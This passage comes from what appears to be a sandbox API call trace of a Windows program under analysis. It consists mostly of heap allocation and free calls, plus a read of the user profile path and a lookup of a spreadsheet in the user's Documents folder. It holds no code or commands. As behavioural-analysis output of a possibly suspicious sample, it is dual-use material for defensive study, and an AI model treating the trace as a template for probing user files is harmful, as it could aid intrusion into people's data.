(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0265.561] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0265.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0265.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0265.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0265.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0265.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0265.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0265.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0265.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0265.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.564] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0265.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0265.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0265.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.565] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0265.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0265.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.565] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.565] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0265.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0265.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0265.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0265.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.567] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0265.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0265.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0265.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0265.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0265.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0265.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0265.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0265.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0265.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0265.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0265.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0265.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.570] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0265.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.571] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0265.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.572] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/OQOxXrKa.ods", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9671e0f0, ftCreationTime.dwHighDateTime=0x1d4c553, ftLastAccessTime.dwLowDateTime=0x91baf540, ftLastAccessTime.dwHighDateTime=0x1d4cd7a, ftLastWriteTime.dwLowDateTime=0x91baf540, ftLastWriteTime.dwHighDateTime=0x1d4cd7a, nFileSizeHigh=0x0, nFileSizeLow=0x11ca6, dwReserved0=0xb3c0047, dwReserved1=0x287d6, cFileName="OQOxXrKa.ods", cAlternateFileName="")) returned 0xaa58a0 [0265.572] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0265.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.573] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0265.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0265.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 